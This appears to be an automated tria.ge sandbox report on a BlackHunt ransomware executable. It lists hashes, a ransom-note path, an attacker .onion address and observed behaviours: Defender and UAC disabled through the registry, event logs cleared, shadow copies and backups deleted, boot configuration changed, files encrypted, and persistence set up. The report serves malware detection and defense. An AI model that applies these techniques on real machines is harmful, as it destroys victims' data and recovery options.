Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:38
Static task
static1
Behavioral task
behavioral1
Sample
b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe
Resource
win10v2004-20231215-en
General
-
Target
b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe
-
Size
707KB
-
MD5
5263171fb74c5c0be3771fcbb53fd8bf
-
SHA1
36ba20dbb7620aa20754fedbc19c2a9be60ad908
-
SHA256
b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c
-
SHA512
a0ae2bd0eaca375e6c473bc3e3e0fe2b04de25ce269e5015da125317fc7aaf2695bd2abd181c5b36b16ab55f2187f79fc66fc19bba5bc921fc8f355205729a18
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1k8Yvnh:6uaTmkZJ+naie5OTamgEoKxLWvmh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1492 fsutil.exe 848 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2372 wevtutil.exe 2176 wevtutil.exe 916 wevtutil.exe 1256 wevtutil.exe 1948 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 3348 bcdedit.exe 3508 bcdedit.exe 2780 bcdedit.exe 2736 bcdedit.exe -
Renames multiple (2905) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3096 wbadmin.exe 300 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 392 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\P: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\L: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\R: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Z: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\V: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\W: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\Y: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\O: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\K: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\U: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\G: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\H: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\Q: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\A: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\T: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\S: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\J: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\X: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\B: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened (read-only) \??\N: b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\Java\jdk1.7.0_80\db\#BlackHunt_Private.key b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\Java\jre7\lib\jfr\#BlackHunt_ReadMe.hta b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lord_Howe b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\#BlackHunt_ReadMe.hta b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_selectionsubpicture.png b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_ReadMe.txt b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\#BlackHunt_ReadMe.txt b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_SelectionSubpicture.png b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.dtd b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-4 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\#BlackHunt_ReadMe.hta b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterBold.ttf b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#BlackHunt_Private.key b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#BlackHunt_Private.key b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javaws.policy b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\Java\jre7\lib\cmm\#BlackHunt_ReadMe.hta b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_ReadMe.txt b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Anchorage b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#BlackHunt_Private.key b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-12 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\#BlackHunt_Private.key b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\#BlackHunt_ReadMe.txt b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\15x15dot.png b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\#BlackHunt_Private.key b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#BlackHunt_ReadMe.hta b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG_PAL.wmv b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#BlackHunt_Private.key b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#BlackHunt_Private.key b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Efate b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-api-caching.jar b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2488 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2064 vssadmin.exe 2472 vssadmin.exe 1800 vssadmin.exe 632 vssadmin.exe 3104 vssadmin.exe 3384 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1672 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2492 PING.EXE -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe Token: SeRestorePrivilege 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe Token: SeBackupPrivilege 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe Token: SeTakeOwnershipPrivilege 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe Token: SeAuditPrivilege 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe Token: SeSecurityPrivilege 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe Token: SeIncBasePriorityPrivilege 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe Token: SeBackupPrivilege 1176 vssvc.exe Token: SeRestorePrivilege 1176 vssvc.exe Token: SeAuditPrivilege 1176 vssvc.exe Token: SeBackupPrivilege 3172 wbengine.exe Token: SeRestorePrivilege 3172 wbengine.exe Token: SeSecurityPrivilege 3172 wbengine.exe Token: SeDebugPrivilege 1672 taskkill.exe Token: SeSecurityPrivilege 1948 wevtutil.exe Token: SeBackupPrivilege 1948 wevtutil.exe Token: SeSecurityPrivilege 2372 wevtutil.exe Token: SeBackupPrivilege 2372 wevtutil.exe Token: SeSecurityPrivilege 916 wevtutil.exe Token: SeBackupPrivilege 916 wevtutil.exe Token: SeSecurityPrivilege 1256 wevtutil.exe Token: SeBackupPrivilege 1256 wevtutil.exe Token: SeSecurityPrivilege 2176 wevtutil.exe Token: SeBackupPrivilege 2176 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2228 wrote to memory of 2432 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 29 PID 2228 wrote to memory of 2432 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 29 PID 2228 wrote to memory of 2432 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 29 PID 2228 wrote to memory of 2432 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 29 PID 2228 wrote to memory of 2740 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 31 PID 2228 wrote to memory of 2740 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 31 PID 2228 wrote to memory of 2740 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 31 PID 2228 wrote to memory of 2740 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 31 PID 2228 wrote to memory of 2820 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 33 PID 2228 wrote to memory of 2820 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 33 PID 2228 wrote to memory of 2820 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 33 PID 2228 wrote to memory of 2820 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 33 PID 2432 wrote to memory of 2852 2432 cmd.exe 35 PID 2432 wrote to memory of 2852 2432 cmd.exe 35 PID 2432 wrote to memory of 2852 2432 cmd.exe 35 PID 2228 wrote to memory of 2764 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 36 PID 2228 wrote to memory of 2764 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 36 PID 2228 wrote to memory of 2764 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 36 PID 2228 wrote to memory of 2764 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 36 PID 2228 wrote to memory of 2880 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 38 PID 2228 wrote to memory of 2880 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 38 PID 2228 wrote to memory of 2880 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 38 PID 2228 wrote to memory of 2880 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 38 PID 2740 wrote to memory of 2864 2740 cmd.exe 40 PID 2740 wrote to memory of 2864 2740 cmd.exe 40 PID 2740 wrote to memory of 2864 2740 cmd.exe 40 PID 2228 wrote to memory of 2308 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 41 PID 2228 wrote to memory of 2308 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 41 PID 2228 wrote to memory of 2308 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 41 PID 2228 wrote to memory of 2308 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 41 PID 2820 wrote to memory of 2356 2820 cmd.exe 42 PID 2820 wrote to memory of 2356 2820 cmd.exe 42 PID 2820 wrote to memory of 2356 2820 cmd.exe 42 PID 2228 wrote to memory of 2648 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 44 PID 2228 wrote to memory of 2648 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 44 PID 2228 wrote to memory of 2648 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 44 PID 2228 wrote to memory of 2648 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 44 PID 2228 wrote to memory of 2916 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 46 PID 2228 wrote to memory of 2916 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 46 PID 2228 wrote to memory of 2916 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 46 PID 2228 wrote to memory of 2916 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 46 PID 2228 wrote to memory of 2776 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 48 PID 2228 wrote to memory of 2776 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 48 PID 2228 wrote to memory of 2776 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 48 PID 2228 wrote to memory of 2776 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 48 PID 2764 wrote to memory of 2784 2764 cmd.exe 50 PID 2764 wrote to memory of 2784 2764 cmd.exe 50 PID 2764 wrote to memory of 2784 2764 cmd.exe 50 PID 2228 wrote to memory of 2872 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 51 PID 2228 wrote to memory of 2872 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 51 PID 2228 wrote to memory of 2872 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 51 PID 2228 wrote to memory of 2872 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 51 PID 2228 wrote to memory of 2608 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 52 PID 2228 wrote to memory of 2608 2228 